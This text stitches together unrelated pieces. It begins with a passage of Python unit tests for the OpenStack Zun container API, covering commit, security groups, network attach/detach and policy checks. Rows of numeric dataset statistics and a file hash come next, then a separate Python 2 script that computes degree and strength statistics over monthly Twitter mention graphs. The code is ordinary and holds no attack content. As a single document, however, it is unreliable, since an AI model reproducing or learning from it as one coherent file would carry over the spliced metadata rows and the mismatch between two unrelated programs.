container_put_archive.assert_called_once_with(
mock.ANY, test_container_obj, cmd['path'], cmd['data'])
def test_put_archive_by_uuid_invalid_state(self):
uuid = uuidutils.generate_uuid()
test_object = utils.create_test_container(context=self.context,
uuid=uuid, status='Error')
with self.assertRaisesRegex(
AppError,
"Cannot put_archive container %s in Error state" % uuid):
self.post('/v1/containers/%s/%s/' % (test_object.uuid,
'put_archive'))
@patch('zun.common.utils.validate_container_state')
@patch('zun.compute.api.API.container_stats')
@patch('zun.objects.Container.get_by_uuid')
def test_stats_container_by_uuid(self, mock_get_by_uuid,
mock_container_stats, mock_validate):
mock_container_stats.return_value = ""
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_get_by_uuid.return_value = test_container_obj
container_uuid = test_container.get('uuid')
        url = '/v1/containers/%s/stats' % container_uuid
response = self.get(url)
self.assertEqual(200, response.status_int)
self.assertTrue(mock_container_stats.called)
@patch('zun.common.utils.validate_container_state')
@patch('zun.compute.api.API.container_commit')
@patch('zun.objects.Container.get_by_name')
def test_commit_by_name(self, mock_get_by_name,
mock_container_commit, mock_validate):
        test_container = utils.get_test_container()
        test_container_obj = objects.Container(self.context, **test_container)
mock_get_by_name.return_value = test_container_obj
mock_container_commit.return_value = None
container_name = test_container.get('name')
url = '/v1/containers/%s/%s/' % (container_name, 'commit')
cmd = {'repository': 'repo', 'tag': 'tag'}
response = self.post(url, cmd)
self.assertEqual(202, response.status_int)
mock_container_commit.assert_called_once_with(
mock.ANY, test_container_obj, cmd['repository'], cmd['tag'])
@patch('zun.common.utils.validate_container_state')
@patch('zun.compute.api.API.container_commit')
@patch('zun.objects.Container.get_by_uuid')
def test_commit_by_uuid(self, mock_get_by_uuid,
mock_container_commit, mock_validate):
        test_container = utils.get_test_container()
        test_container_obj = objects.Container(self.context, **test_container)
mock_get_by_uuid.return_value = test_container_obj
mock_container_commit.return_value = None
container_uuid = test_container.get('uuid')
url = '/v1/containers/%s/%s/' % (container_uuid, 'commit')
cmd = {'repository': 'repo', 'tag': 'tag'}
response = self.post(url, cmd)
self.assertEqual(202, response.status_int)
mock_container_commit.assert_called_once_with(
mock.ANY, test_container_obj, cmd['repository'], cmd['tag'])
def test_commit_by_uuid_invalid_state(self):
uuid = uuidutils.generate_uuid()
cmd = {'repository': 'repo', 'tag': 'tag'}
utils.create_test_container(context=self.context,
uuid=uuid, status='Error')
with self.assertRaisesRegex(
AppError, "Cannot commit container %s in Error state" % uuid):
self.post('/v1/containers/%s/commit/' % uuid, cmd)
@patch('zun.common.utils.validate_container_state')
@patch('zun.compute.api.API.container_exec_resize')
@patch('zun.api.utils.get_resource')
def test_execute_resize_container_exec(
self, mock_get_resource, mock_exec_resize, mock_validate):
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_get_resource.return_value = test_container_obj
mock_exec_resize.return_value = None
container_name = test_container.get('name')
url = '/v1/containers/%s/%s/' % (container_name, 'execute_resize')
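        # Apparently a Docker-style 64-hex-digit exec id, split across two
        # string literals purely for line length.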
fake_exec_id = ('7df36611fa1fc855618c2c643835d41d'
'ac3fe568e7688f0bae66f7bcb3cccc6c')
kwargs = {'exec_id': fake_exec_id, 'h': '100', 'w': '100'}
response = self.post(url, kwargs)
self.assertEqual(200, response.status_int)
mock_exec_resize.assert_called_once_with(
mock.ANY, test_container_obj, fake_exec_id, kwargs['h'],
kwargs['w'])
@mock.patch('zun.compute.api.API.add_security_group')
@mock.patch('zun.network.neutron.NeutronAPI.find_resourceid_by_name_or_id')
@mock.patch('zun.api.utils.get_resource')
def test_add_security_group_by_uuid(self, mock_get_resource,
mock_find_resourceid,
mock_add_security_group):
headers = {"OpenStack-API-Version": "container 1.14"}
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_get_resource.return_value = test_container_obj
mock_find_resourceid.return_value = 'fake_security_group_id'
container_name = test_container.get('name')
security_group_id_to_add = '5f7cf831-9a9c-4e2b-87b2-6081667f852b'
url = '/v1/containers/%s/%s?name=%s' % (container_name,
'add_security_group',
security_group_id_to_add)
response = self.post(url, headers=headers)
self.assertEqual(202, response.status_int)
self.assertEqual('application/json', response.content_type)
mock_find_resourceid.assert_called_once_with(
'security_group', security_group_id_to_add, mock.ANY)
mock_add_security_group.assert_called_once_with(
mock.ANY, test_container_obj, 'fake_security_group_id')
@mock.patch('zun.compute.api.API.add_security_group')
@mock.patch('zun.network.neutron.NeutronAPI.find_resourceid_by_name_or_id')
@mock.patch('zun.api.utils.get_resource')
def test_add_security_group_not_found(self, mock_get_resource,
mock_find_resourceid,
mock_add_security_group):
headers = {"OpenStack-API-Version": "container 1.14"}
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_get_resource.return_value = test_container_obj
mock_find_resourceid.side_effect = n_exc.NotFound()
container_name = test_container.get('name')
security_group_to_add = '5f7cf831-9a9c-4e2b-87b2-6081667f852b'
url = '/v1/containers/%s/%s?name=%s' % (container_name,
'add_security_group',
security_group_to_add)
response = self.post(url, expect_errors=True, headers=headers)
self.assertEqual(400, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertEqual(
"Security group %s not found." % security_group_to_add,
response.json['errors'][0]['detail'])
@mock.patch('zun.compute.api.API.add_security_group')
@mock.patch('zun.network.neutron.NeutronAPI.find_resourceid_by_name_or_id')
@mock.patch('zun.api.utils.get_resource')
def test_add_security_group_not_unique_match(self, mock_get_resource,
mock_find_resourceid,
mock_add_security_group):
headers = {"OpenStack-API-Version": "container 1.14"}
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_get_resource.return_value = test_container_obj
mock_find_resourceid.side_effect = n_exc.NeutronClientNoUniqueMatch()
container_name = test_container.get('name')
security_group_to_add = '5f7cf831-9a9c-4e2b-87b2-6081667f852b'
url = '/v1/containers/%s/%s?name=%s' % (container_name,
'add_security_group',
security_group_to_add)
response = self.post(url, expect_errors=True, headers=headers)
self.assertEqual(409, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertEqual(
"Multiple security group matches found for name %s, "
"use an ID to be more specific." % security_group_to_add,
response.json['errors'][0]['detail'])
@patch('zun.network.neutron.NeutronAPI.get_neutron_network')
@patch('zun.compute.api.API.network_attach')
@patch('zun.objects.Container.get_by_uuid')
def test_network_attach(self, mock_by_uuid, mock_attach, mock_get_network):
built_requested_network = {
'network': 'fake-net-id',
'port': '',
'router:external': False,
'shared': False,
'fixed_ip': '',
'preserve_on_delete': False}
query = 'network=private'
self._test_network_attach(mock_by_uuid, mock_attach, mock_get_network,
query, built_requested_network)
mock_get_network.assert_called_once_with('private')
@patch('zun.network.neutron.NeutronAPI.get_neutron_network')
@patch('zun.compute.api.API.network_attach')
@patch('zun.objects.Container.get_by_uuid')
def test_network_attach_with_fixed_ip(self, mock_by_uuid, mock_attach,
mock_get_network):
built_requested_network = {
'network': 'fake-net-id',
'port': '',
'router:external': False,
'shared': False,
'fixed_ip': '10.0.0.3',
'preserve_on_delete': False}
query = 'network=private&fixed_ip=10.0.0.3'
self._test_network_attach(mock_by_uuid, mock_attach, mock_get_network,
query, built_requested_network)
mock_get_network.assert_called_once_with('private')
@patch('zun.network.neutron.NeutronAPI.get_neutron_port')
@patch('zun.network.neutron.NeutronAPI.ensure_neutron_port_usable')
@patch('zun.network.neutron.NeutronAPI.get_neutron_network')
@patch('zun.compute.api.API.network_attach')
@patch('zun.objects.Container.get_by_uuid')
def test_network_attach_with_port(self, mock_by_uuid, mock_attach,
mock_get_network,
mock_ensure, mock_get_port):
mock_get_port.return_value = {
'id': 'fake-port-id',
'network_id': 'fake-net-id',
}
built_requested_network = {
'network': 'fake-net-id',
'port': 'fake-port-id',
'router:external': False,
'shared': False,
'fixed_ip': '',
'preserve_on_delete': True}
query = 'port=fake-port'
self._test_network_attach(mock_by_uuid, mock_attach, mock_get_network,
query, built_requested_network)
mock_get_port.assert_called_once_with('fake-port')
mock_get_network.assert_called_once_with('fake-net-id')
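    # Shared helper: POSTs network_attach with the given query string and
    # verifies the requested-network dict handed to the compute API.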
def _test_network_attach(self, mock_by_uuid, mock_attach, mock_get_network,
query, built_requested_network):
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_by_uuid.return_value = test_container_obj
container_uuid = test_container.get('uuid')
fake_network = {'id': 'fake-net-id',
'router:external': False,
'shared': False}
mock_get_network.return_value = fake_network
url = '/v1/containers/%s/%s?%s' % (container_uuid, 'network_attach',
query)
response = self.post(url)
self.assertEqual(200, response.status_int)
mock_attach.assert_called_once_with(mock.ANY, test_container_obj,
built_requested_network)
@patch('zun.network.neutron.NeutronAPI.get_neutron_network')
@patch('zun.compute.api.API.network_detach')
@patch('zun.objects.Container.get_by_uuid')
def test_network_detach(self, mock_by_uuid, mock_detach, mock_get_network):
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_by_uuid.return_value = test_container_obj
container_uuid = test_container.get('uuid')
mock_get_network.return_value = {'id': 'private'}
mock_detach.return_value = None
url = '/v1/containers/%s/%s?network=%s' % (container_uuid,
'network_detach',
'private')
response = self.post(url)
self.assertEqual(202, response.status_int)
mock_detach.assert_called_once_with(mock.ANY, test_container_obj,
'private')
@patch('zun.network.neutron.NeutronAPI.get_neutron_port')
@patch('zun.compute.api.API.network_detach')
@patch('zun.objects.Container.get_by_uuid')
def test_network_detach_with_port(self, mock_by_uuid, mock_detach,
mock_get_port):
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_by_uuid.return_value = test_container_obj
container_uuid = test_container.get('uuid')
mock_get_port.return_value = {'network_id': 'fake-net-id'}
mock_detach.return_value = None
url = '/v1/containers/%s/%s?port=%s' % (container_uuid,
'network_detach',
'fake-port')
response = self.post(url)
self.assertEqual(202, response.status_int)
mock_detach.assert_called_once_with(mock.ANY, test_container_obj,
'fake-net-id')
@patch('zun.objects.Container.get_by_uuid')
def test_network_list(self, mock_container_get_by_uuid):
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_container_get_by_uuid.return_value = test_container_obj
container_uuid = test_container.get('uuid')
url = '/v1/containers/%s/%s' % (container_uuid, 'network_list')
response = self.get(url)
self.assertEqual(200, response.status_int)
mock_container_get_by_uuid.assert_called_once_with(
mock.ANY,
test_container['uuid'])
self._assert_networks(test_container['addresses'],
response.json['networks'])
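    # Cross-check every address stored on the container record against
    # exactly one fixed_ip entry of the matching network in the response.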
def _assert_networks(self, addresses, networks):
self.assertEqual(len(addresses), len(networks))
for network in networks:
address_list = addresses[network['net_id']]
self.assertEqual(len(address_list), len(network['fixed_ips']))
for address in address_list:
matched = 0
for fixed_ip in network['fixed_ips']:
if (address['addr'] == fixed_ip['ip_address'] and
address['version'] == fixed_ip['version'] and
address['subnet_id'] == fixed_ip['subnet_id'] and
address['port'] == network['port_id']):
matched += 1
self.assertEqual(1, matched)
@mock.patch('zun.compute.api.API.remove_security_group')
@mock.patch('zun.network.neutron.NeutronAPI.find_resourceid_by_name_or_id')
@mock.patch('zun.api.utils.get_resource')
def test_remove_security_group_by_uuid(self, mock_get_resource,
mock_find_resourceid,
mock_remove_security_group):
headers = {"OpenStack-API-Version": "container 1.14"}
test_container = utils.get_test_container(
security_groups=['affb9021-964d-4b1b-80a8-9b9db60497e4'])
test_container_obj = objects.Container(self.context, **test_container)
mock_get_resource.return_value = test_container_obj
mock_find_resourceid.return_value = \
test_container_obj.security_groups[0]
container_name = test_container.get('name')
security_group_id_to_remove = test_container_obj.security_groups[0]
url = '/v1/containers/%s/%s?name=%s' % (container_name,
'remove_security_group',
security_group_id_to_remove)
response = self.post(url, headers=headers)
self.assertEqual(202, response.status_int)
self.assertEqual('application/json', response.content_type)
mock_find_resourceid.assert_called_once_with(
'security_group', security_group_id_to_remove, mock.ANY)
mock_remove_security_group.assert_called_once_with(
mock.ANY, test_container_obj,
test_container_obj.security_groups[0])
class TestContainerEnforcement(api_base.FunctionalTest):
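    # Install a rule the request's fake project cannot satisfy (optionally
    # relaxing prerequisite rules via bypass_rules), then expect a 403 with
    # the standard policy error message.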
def _common_policy_check(self, rule, func, *arg, **kwarg):
rules = dict({rule: 'project_id:non_fake'},
**kwarg.pop('bypass_rules', {}))
self.policy.set_rules(rules)
response = func(*arg, **kwarg)
self.assertEqual(403, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertEqual(
"Policy doesn't allow %s to be performed." % rule,
response.json['errors'][0]['detail'])
def test_policy_disallow_get_all(self):
self._common_policy_check(
'container:get_all', self.get, '/v1/containers/',
expect_errors=True)
def test_policy_disallow_get_all_all_projects(self):
self._common_policy_check(
'container:get_all_all_projects',
self.get, '/v1/containers/?all_projects=1',
expect_errors=True,
bypass_rules={'container:get_all': 'project_id:fake_project'})
def test_policy_disallow_get_one(self):
container = obj_utils.create_test_container(self.context)
self._common_policy_check(
'container:get_one', self.get,
'/v1/containers/%s/' % container.uuid,
expect_errors=True)
def test_policy_disallow_get_one_all_projects(self):
container = obj_utils.create_test_container(self.context)
self._common_policy_check(
'container:get_one_all_projects', self.get,
'/v1/containers/%s/?all_projects=1' % container.uuid,
expect_errors=True)
def test_policy_disallow_update(self):
container = obj_utils.create_test_container(self.context)
params = {'cpu': 1}
self._common_policy_check(
'container:update', self.patch_json,
'/containers/%s/' % container.uuid, params,
expect_errors=True)
def test_policy_disallow_create(self):
params = ('{"name": "MyDocker", "image": "ubuntu",'
'"command": ["env"], "memory": "512"}')
self._common_policy_check(
'container:create', self.post, '/v1/containers/',
params=params,
content_type='application/json',
expect_errors=True)
def test_policy_disallow_delete(self):
container = obj_utils.create_test_container(self.context)
self._common_policy_check(
'container:delete', self.delete,
'/v1/containers/%s/' % container.uuid,
expect_errors=True)
def test_policy_disallow_delete_all_projects(self):
container = obj_utils.create_test_container(self.context)
self._common_policy_check(
'container:delete_all_projects', self.delete,
'/v1/containers/%s/?all_projects=1' % container.uuid,
expect_errors=True)
def test_policy_disallow_delete_force(self):
container = obj_utils.create_test_container(self.context)
self._common_policy_check(
'container:delete_force', self.delete,
'/v1/containers/%s/?force=True' % container.uuid,
expect_errors=True,
bypass_rules={'container:delete': 'project_id:fake_project'})
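    # Owner-scoped variant: the rule only passes when the request's user_id
    # matches the container's, so a container owned by 'another' yields 403.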
def _owner_check(self, rule, func, *args, **kwargs):
self.policy.set_rules({rule: "user_id:%(user_id)s"})
response = func(*args, **kwargs)
self.assertEqual(403, response.status_int)
self.assertEqual('application/json', response.content_type)
        # assertTrue with two arguments treats the second as a message and
        # always passes for a non-empty string; compare the values instead.
        self.assertEqual(
            "Policy doesn't allow %s to be performed." % rule,
            response.json['errors'][0]['detail'])
def test_policy_only_owner_get_one(self):
container = obj_utils.create_test_container(self.context,
user_id='another')
self._owner_check("container:get_one", self.get_json,
'/containers/%s/' % container.uuid,
expect_errors=True)
def test_policy_only_owner_update(self):
container = obj_utils.create_test_container(self.context,
user_id='another')
self._owner_check(
"container:update", self.patch_json,
'/containers/%s/' % container.uuid,
{'cpu': 1},
expect_errors=True)
def test_policy_only_owner_delete(self):
container = obj_utils.create_test_container(self.context,
user_id='another')
self._owner_check(
"container:delete", self.delete,
'/containers/%s/' % container.uuid,
expect_errors=True)
def test_policy_only_owner_logs(self):
container = obj_utils.create_test_container(self.context,
user_id='another')
self._owner_check("container:logs", self.get_json,
'/containers/%s/logs/' % container.uuid,
expect_errors=True)
def test_policy_only_owner_execute(self):
container = obj_utils.create_test_container(self.context,
user_id='another')
self._owner_check("container:execute", self.post_json,
'/containers/%s/execute/' % container.uuid,
params={'command': 'ls'}, expect_errors=True)
def test_policy_only_owner_actions(self):
actions = ['start', 'stop', 'reboot', 'pause', 'unpause']
container = obj_utils.create_test_container(self.context,
user_id='another')
for action in actions:
self._owner_check('container:%s' % action, self.post_json,
'/containers/%s/%s/' % (container.uuid, action),
{}, expect_errors=True)
class TestContainerActionController(api_base.FunctionalTest):
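    # Strip DB-only fields so stored action/event dicts can be compared
    # directly with the API's serialized JSON.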
def _format_action(self, action, expect_traceback=True):
'''Remove keys that aren't serialized.'''
to_delete = ('id', 'finish_time', 'created_at', 'updated_at',
'deleted_at', 'deleted')
        for key in to_delete:
            if key in action:
                del action[key]
for event in action.get('events', []):
self._format_event(event, expect_traceback)
return action
def _format_event(self, event, expect_traceback=True):
'''Remove keys that aren't serialized.'''
to_delete = ['id', 'created_at', 'updated_at', 'deleted_at', 'deleted',
'action_id']
if not expect_traceback:
event['traceback'] = None
        for key in to_delete:
            if key in event:
                del event[key]
return event
@mock.patch('zun.objects.Container.get_by_uuid')
@mock.patch('zun.objects.ContainerAction.get_by_container_uuid')
def test_list_actions(self, mock_get_by_container_uuid,
mock_container_get_by_uuid):
test_container = utils.get_test_container()
test_action = utils.get_test_action_value(
container_uuid=test_container['uuid'])
container_object = objects.Container(self.context, **test_container)
action_object = objects.ContainerAction(self.context, **test_action)
mock_container_get_by_uuid.return_value = container_object
mock_get_by_container_uuid.return_value = [action_object]
response = self.get('/v1/containers/%s/container_actions' %
test_container['uuid'])
mock_get_by_container_uuid.assert_called_once_with(
mock.ANY,
test_container['uuid'])
self.assertEqual(200, response.status_int)
self.assertEqual(
self._format_action(test_action),
self._format_action(response.json['containerActions'][0]))
@mock.patch('zun.objects.Container.get_by_uuid')
@mock.patch('zun.common.policy.enforce')
@mock.patch('zun.objects.ContainerActionEvent.get_by_action')
@mock.patch('zun.objects.ContainerAction.get_by_request_id')
def test_get_action_with_events_allowed(self, mock_get_by_request_id,
mock_get_by_action, mock_policy,
mock_container_get_by_uuid):
mock_policy.return_value = True
test_container = utils.get_test_container()
test_action = utils.get_test_action_value(
container_uuid=test_container['uuid'])
test_event = utils.get_test_action_event_value(
action_id=test_action['id'])
test_action['events'] = [test_event]
container_object = objects.Container(self.context, **test_container)
action_object = objects.ContainerAction(self.context, **test_action)
event_object = objects.ContainerActionEvent(self.context, **test_event)
mock_container_get_by_uuid.return_value = container_object
mock_get_by_request_id.return_value = action_object
mock_get_by_action.return_value = [event_object]
response = self.get('/v1/containers/%s/container_actions/%s' % (
test_container['uuid'], test_action['request_id']))
mock_get_by_request_id.assert_called_once_with(
mock.ANY, test_container['uuid'], test_action['request_id'])
mock_get_by_action.assert_called_once_with(mock.ANY, test_action['id'])
self.assertEqual(200, response.status_int)
self.assertEqual(self._format_action(test_action),
self._format_action(response.json))
@mock.patch('zun.objects.Container.get_by_uuid')
@mock.patch('zun.common.policy.enforce')
@mock.patch('zun.objects.ContainerActionEvent.get_by_action')
@mock.patch('zun.objects.ContainerAction.get_by_request_id')
def test_get_action_with_events_not_allowed(self, mock_get_by_request_id,
mock_get_by_action,
mock_policy,
mock_container_get_by_uuid):
mock_policy.return_value = False
test_container = utils.get_test_container()
container_obj = objects.Container(self.context, **test_container)
test_action = utils.get_test_action_value(
container_uuid=test_container['uuid'])
test_event = utils.get_test_action_event_value(
action_id=test_action['id'])
test_action['events'] = [test_event]
action_object = objects.ContainerAction(self.context, **test_action)
event_object = objects.ContainerActionEvent(self.context, **test_event)
mock_container_get_by_uuid.return_value = container_obj
mock_get_by_request_id.return_value = action_object
mock_get_by_action.return_value = [event_object]
response = self.get('/v1/containers/%s/container_actions/%s' % (
test_container['uuid'], test_action['request_id']))
mock_get_by_request_id.assert_called_once_with(
mock.ANY, test_container['uuid'], test_action['request_id'])
mock_get_by_action.assert_called_once_with(mock.ANY, test_action['id'])
self.assertEqual(200, response.status_int)
self.assertEqual(self._format_action(test_action,
expect_traceback=False),
self._format_action(response.json))
@mock.patch('zun.objects.Container.get_by_uuid')
@mock.patch('zun.objects.ContainerAction.get_by_request_id')
def test_action_not_found(self, mock_get_by_request_id,
mock_container_get_by_uuid):
test_container = utils.get_test_container()
container_obj = objects.Container(self.context, **test_container)
mock_container_get_by_uuid.return_value = container_obj
mock_get_by_request_id.return_value = None
fake_request_id = 'request'
self.assertRaises(AppError, self.get,
('/v1/containers/%s/container_actions/%s' %
(test_container['uuid'], fake_request_id)))
mock_get_by_request_id.assert_called_once_with(
mock.ANY, test_container['uuid'], fake_request_id)
@mock.patch('zun.objects.Container.get_by_uuid')
def test_container_not_found(self, mock_container_get_by_uuid):
test_container = utils.get_test_container()
self.assertRaises(AppError, self.get,
('/v1/containers/%s/container_actions'
% test_container['uuid']))
mock_container_get_by_uuid.assert_called_once_with(
mock.ANY, test_container['uuid'])
class TestContainerActionEnforcement(api_base.FunctionalTest):
def _common_policy_check(self, rule, func, *arg, **kwarg):
rules = dict({rule: 'project_id:non_fake'},
**kwarg.pop('bypass_rules', {}))
self.policy.set_rules(rules)
response = func(*arg, **kwarg)
self.assertEqual(403, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertEqual(
"Policy doesn't allow %s to be performed." % rule,
response.json['errors'][0]['detail'])
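    # The checks below follow one pattern: install a rule that the request's
    # fake project can never satisfy, e.g.
    #     self.policy.set_rules({'container:actions': 'project_id:non_fake'})
    # then issue the call with expect_errors=True and assert the 403 payload.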
def test_list_actions_disallow_by_project(self):
container = obj_utils.create_test_container(self.context)
self._common_policy_check(
'container:actions', self.get,
'/v1/containers/%s/container_actions/' % container.uuid,
expect_errors=True)
def test_get_action_disallow_by_project(self):
container = obj_utils.create_test_container(self.context)
self._common_policy_check(
'container:actions', self.get,
'/v1/containers/%s/container_actions/fake_request' %
container.uuid, expect_errors=True)
| 49.685961 | 79 | 0.614242 | 12,710 | 115,023 | 5.246184 | 0.037451 | 0.07896 | 0.032394 | 0.027265 | 0.893955 | 0.868249 | 0.852187 | 0.827742 | 0.809445 | 0.795228 | 0 | 0.012096 | 0.272632 | 115,023 | 2,314 | 80 | 49.707433 | 0.78489 | 0.014006 | 0 | 0.708762 | 0 | 0 | 0.19813 | 0.106744 | 0 | 0 | 0 | 0.000432 | 0.17768 | 1 | 0.066569 | false | 0.001958 | 0.004895 | 0 | 0.07489 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
2203e391f57e7f400cc2cc55493f30b9bb268af6 | 4,826 | py | Python | src_graph/edges_all_MENT_per_MO_TOT_ST.py | sanja7s/SR_Twitter | 2eb499c9aa25ba6e9860cd77eac6832890d2c126 | ["MIT"] | null | null | null | src_graph/edges_all_MENT_per_MO_TOT_ST.py | sanja7s/SR_Twitter | 2eb499c9aa25ba6e9860cd77eac6832890d2c126 | ["MIT"] | null | null | null | src_graph/edges_all_MENT_per_MO_TOT_ST.py | sanja7s/SR_Twitter | 2eb499c9aa25ba6e9860cd77eac6832890d2c126 | ["MIT"] | null | null | null |
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
"""
From the edge formation/deletion data, find the persisting edges and their monthly REL ST.
"""
from collections import defaultdict
import codecs
import os
import json
import numpy as np
from igraph import *
IN_DIR = "../../../DATA/General/"
os.chdir(IN_DIR)
F_IN = "mention/edge_formation_deletion_MOs.dat"
MONTHS = ["5", "6", "7", "8", "9", "10", "11"]
#########################
# read from a file that is an edge list with weights
#########################
def read_in_MO_graph(MO):
G = Graph.Read_Ncol('mention/' + MO + '_MENT_weight_dir_self_loops', directed=True, weights=True)
print G.summary()
return G
def read_in_MO_graph_MUTUAL_UNW(MO):
G = Graph.Read_Ncol('mention/' + MO + '_MENT_weight_dir_self_loops', directed=True, weights=True)
G.to_undirected(mode="mutual", combine_edges='ignore')
print G.summary()
return G
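# Minimal sketch of the mutual reduction above (toy graph, not dataset data):
#   g = Graph(directed=True)
#   g.add_vertices(3)
#   g.add_edges([(0, 1), (1, 0), (1, 2)])
#   g.to_undirected(mode="mutual", combine_edges='ignore')
#   # g keeps only the reciprocated pair as the undirected edge 0-1;
#   # the one-way edge 1->2 is dropped.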
def extract_edges_per_MO_REL_ST_with_STDEV_POP():
MO_MENT = defaultdict(int)
for MO in MONTHS:
MO_MENT[MO] = read_in_MO_graph(MO).copy()
cnt = 0
TOT = defaultdict(list)
i = 0
N = 7
MO = MONTHS[i]
while i < N-1:
G = MO_MENT[MO]
for e in G.es:
src_id = e.source
dest_id = e.target
try:
popA = G.strength(src_id, mode=IN, weights='weight')
except IndexError:
popA = 0
try:
popB = G.strength(dest_id, mode=IN, weights='weight')
except IndexError:
popB = 0
diff = abs(popA + popB)
            TOT[MO].append(diff)
            cnt += 1  # count processed edges for the summary print below
i += 1
MO = MONTHS[i]
print "processed %d edges " % cnt
cnt = float(cnt)
for MO in MONTHS[:-1]:
TOT[MO] = np.array(TOT[MO])
avg = np.nanmean(TOT[MO])
std = np.nanstd(TOT[MO])
print TOT[MO]
print "Average REL ST POP, stdev %f, %f, at the time %s " % \
(avg, std, MO)
def extract_edges_per_MO_REL_ST_with_STDEV_ACT():
MO_MENT = defaultdict(int)
for MO in MONTHS:
MO_MENT[MO] = read_in_MO_graph(MO).copy()
cnt = 0
TOT = defaultdict(list)
i = 0
N = 7
MO = MONTHS[i]
while i < N-1:
G = MO_MENT[MO]
for e in G.es:
src_id = e.source
dest_id = e.target
#userA = G.vs[src_id]['name']
            #userB = G.vs[dest_id]['name']
try:
popA = G.strength(src_id, mode=OUT, weights='weight')
except IndexError:
popA = 0
try:
popB = G.strength(dest_id, mode=OUT, weights='weight')
except IndexError:
popB = 0
diff = abs(popA + popB)
            TOT[MO].append(diff)
            cnt += 1  # count processed edges for the summary print below
i += 1
MO = MONTHS[i]
print "processed %d edges " % cnt
cnt = float(cnt)
for MO in MONTHS[:-1]:
TOT[MO] = np.array(TOT[MO])
avg = np.nanmean(TOT[MO])
std = np.nanstd(TOT[MO])
print TOT[MO]
print "Average REL ST ACT, stdev %f, %f, at the time %s " % \
(avg, std, MO)
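# The two extractors above differ only in the strength mode: mode=IN sums the
# weights of incoming mentions (a popularity-style score), mode=OUT sums the
# weights of outgoing mentions (an activity-style score). In both, despite its
# name, diff = abs(popA + popB) is the combined strength of the edge's two
# endpoints.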
def extract_edges_per_MO_REL_ST_with_STDEV_MUTUAL_UNW():
MO_MENT = defaultdict(int)
for MO in MONTHS:
# strong
MO_MENT[MO] = read_in_MO_graph_MUTUAL_UNW(MO).copy()
# weak
#MO_MENT[MO] = read_in_MO_graph(MO).copy()
cnt = 0
TOT = defaultdict(list)
i = 0
N = 7
MO = MONTHS[i]
while i < N-1:
G = MO_MENT[MO]
for e in G.es:
src_id = e.source
dest_id = e.target
try:
popA = G.degree(src_id)
except IndexError:
popA = 0
try:
popB = G.degree(dest_id)
except IndexError:
popB = 0
diff = abs(popA + popB)
if diff == 552:
userA = G.vs[src_id]['name']
                userB = G.vs[dest_id]['name']
                print popA, popB
                print userA, userB
            TOT[MO].append(diff)
            cnt += 1  # count processed edges for the summary print below
i += 1
MO = MONTHS[i]
print "processed %d edges " % cnt
cnt = float(cnt)
for MO in MONTHS[:-1]:
TOT[MO] = np.array(TOT[MO])
avg = np.mean(TOT[MO])
std = np.std(TOT[MO])
print TOT[MO]
print "Average TOT ST MUTUAL CONTACTS, stdev %f, %f, at the time %s " % \
(avg, std, MO)
def extract_edges_per_MO_REL_ST_with_STDEV_TOTAL_UNW():
MO_MENT = defaultdict(int)
for MO in MONTHS:
# strong
#MO_MENT[MO] = read_in_MO_graph_MUTUAL_UNW(MO).copy()
# weak
MO_MENT[MO] = read_in_MO_graph(MO).copy()
cnt = 0
TOT = defaultdict(list)
i = 0
N = 7
MO = MONTHS[i]
while i < N-1:
G = MO_MENT[MO]
for e in G.es:
src_id = e.source
dest_id = e.target
try:
popA = G.degree(src_id)
except IndexError:
popA = 0
try:
popB = G.degree(dest_id)
except IndexError:
popB = 0
diff = abs(popA + popB)
if diff == 552:
userA = G.vs[src_id]['name']
                userB = G.vs[dest_id]['name']
                print popA, popB
                print userA, userB
            TOT[MO].append(diff)
            cnt += 1  # count processed edges for the summary print below
i += 1
MO = MONTHS[i]
print "processed %d edges " % cnt
cnt = float(cnt)
for MO in MONTHS[:-1]:
TOT[MO] = np.array(TOT[MO])
avg = np.mean(TOT[MO])
std = np.std(TOT[MO])
print TOT[MO]
print "Average TOT ST TOTAL CONTACTS, stdev %f, %f, at the time %s " % \
(avg, std, MO)
print 'Strong'
extract_edges_per_MO_REL_ST_with_STDEV_MUTUAL_UNW()
print 'Total, including weak'
extract_edges_per_MO_REL_ST_with_STDEV_TOTAL_UNW()
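# Importing or running this module therefore executes the last two calls in
# sequence: mutual (strong-tie) statistics first, then total statistics
# including weak ties; the POP and ACT extractors are defined but not invoked.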
| 20.362869 | 98 | 0.629092 | 823 | 4,826 | 3.521264 | 0.162819 | 0.041408 | 0.027605 | 0.035887 | 0.857833 | 0.852312 | 0.837474 | 0.811939 | 0.811939 | 0.800207 | 0 | 0.012732 | 0.218815 | 4,826 | 236 | 99 | 20.449153 | 0.755968 | 0.055325 | 0 | 0.82659 | 0 | 0 | 0.117138 | 0.026208 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.034682 | null | null | 0.115607 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
